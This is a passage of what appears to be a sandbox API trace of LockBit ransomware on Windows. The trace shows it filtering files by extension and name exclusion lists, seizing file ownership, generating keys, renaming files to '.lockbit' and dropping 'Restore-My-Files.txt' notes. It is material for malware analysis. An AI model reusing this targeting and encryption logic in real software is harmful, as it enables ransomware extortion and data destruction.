lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0079.523] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0079.523] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv.lockbit") returned 85 [0079.523] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.524] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.524] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.524] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.525] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.525] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.525] RtlFreeAnsiString (AnsiString="\\") [0079.525] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.525] malloc (_Size=0x200) returned 0x77d800 [0079.525] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.525] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.525] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.525] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.526] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.526] CloseHandle (hObject=0x3c4) returned 1 [0079.526] free (_Block=0x77d800) [0079.526] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.526] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.526] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.526] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=237298) returned 1 [0079.526] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.527] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.527] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.527] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.527] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0079.545] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.545] malloc (_Size=0xc0) returned 0x1ff1e60 [0079.545] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc0, FileInformationClass=0xa) returned 0xc0000008 [0079.545] free (_Block=0x1ff1e60) [0079.545] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.545] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.545] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.545] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729635a0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729635a0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a377d1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x41c0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bear_Formatted_RGB6_PAL.wmv", cAlternateFileName="")) returned 1 [0079.545] lstrcmpiW (lpString1=".", lpString2="Bear_Formatted_RGB6_PAL.wmv") returned -1 [0079.545] lstrcmpiW (lpString1="..", lpString2="Bear_Formatted_RGB6_PAL.wmv") returned -1 [0079.545] PathFindExtensionW (pszPath="Bear_Formatted_RGB6_PAL.wmv") returned=".wmv" [0079.545] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0079.545] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0079.545] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0079.545] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0079.545] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0079.546] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0079.546] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0079.547] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0079.547] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0079.547] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0079.547] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0079.547] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0079.547] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0079.547] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0079.547] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0079.547] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0079.547] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0079.547] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0079.547] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.547] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0079.547] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0079.547] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0079.547] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0079.547] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Bear_Formatted_RGB6_PAL.wmv") returned 1 [0079.547] lstrcmpiW (lpString1="ntldr", lpString2="Bear_Formatted_RGB6_PAL.wmv") returned 1 [0079.547] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Bear_Formatted_RGB6_PAL.wmv") returned 1 [0079.547] lstrcmpiW (lpString1="bootsect.bak", lpString2="Bear_Formatted_RGB6_PAL.wmv") returned 1 [0079.547] lstrcmpiW (lpString1="autorun.inf", lpString2="Bear_Formatted_RGB6_PAL.wmv") returned -1 [0079.547] lstrcmpiW (lpString1="thumbs.db", lpString2="Bear_Formatted_RGB6_PAL.wmv") returned 1 [0079.547] lstrcmpiW (lpString1="iconcache.db", lpString2="Bear_Formatted_RGB6_PAL.wmv") returned 1 [0079.547] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.548] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned=".wmv" [0079.548] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0079.548] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0079.548] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0079.549] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0079.549] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0079.549] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0079.549] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv.lockbit") returned 89 [0079.549] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.549] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.550] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.550] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.550] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.550] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.550] RtlFreeAnsiString (AnsiString="\\") [0079.550] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.550] malloc (_Size=0x200) returned 0x77d800 [0079.551] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.551] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.551] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.551] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.552] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.552] CloseHandle (hObject=0x3c4) returned 1 [0079.552] free (_Block=0x77d800) [0079.552] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.552] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.552] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.553] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=269322) returned 1 [0079.553] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.553] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.553] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.554] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.554] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.556] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.556] malloc (_Size=0xc8) returned 0x1ff1e60 [0079.556] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc8, FileInformationClass=0xa) returned 0x0 [0079.556] free (_Block=0x1ff1e60) [0079.556] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.556] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.556] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.557] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729af85a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729af85a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a377d1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-back-static.png", cAlternateFileName="")) returned 1 [0079.557] lstrcmpiW (lpString1=".", lpString2="btn-back-static.png") returned -1 [0079.557] lstrcmpiW (lpString1="..", lpString2="btn-back-static.png") returned -1 [0079.557] PathFindExtensionW (pszPath="btn-back-static.png") returned=".png" [0079.557] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.557] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.557] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.557] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.557] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.557] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.557] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.557] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.557] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.557] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.557] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.557] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.557] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.557] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.557] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.557] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.557] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.558] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.558] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.558] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.558] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.558] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.558] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.558] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.558] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.558] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.558] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.558] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.558] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.558] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.558] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.558] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.558] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.558] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.558] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.558] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.558] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.558] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.558] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.558] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.558] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.559] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.559] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.559] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.559] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.559] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.559] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.559] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="btn-back-static.png") returned 1 [0079.559] lstrcmpiW (lpString1="ntldr", lpString2="btn-back-static.png") returned 1 [0079.559] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="btn-back-static.png") returned 1 [0079.559] lstrcmpiW (lpString1="bootsect.bak", lpString2="btn-back-static.png") returned -1 [0079.559] lstrcmpiW (lpString1="autorun.inf", lpString2="btn-back-static.png") returned -1 [0079.559] lstrcmpiW (lpString1="thumbs.db", lpString2="btn-back-static.png") returned 1 [0079.559] lstrcmpiW (lpString1="iconcache.db", lpString2="btn-back-static.png") returned 1 [0079.559] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.559] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned=".png" [0079.559] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.559] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.559] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.559] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.559] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.559] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.560] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.560] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.560] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.560] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.560] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.560] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.560] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.560] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.560] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.560] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.560] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.560] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.560] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.560] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.560] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.560] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.560] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.560] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.560] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.560] 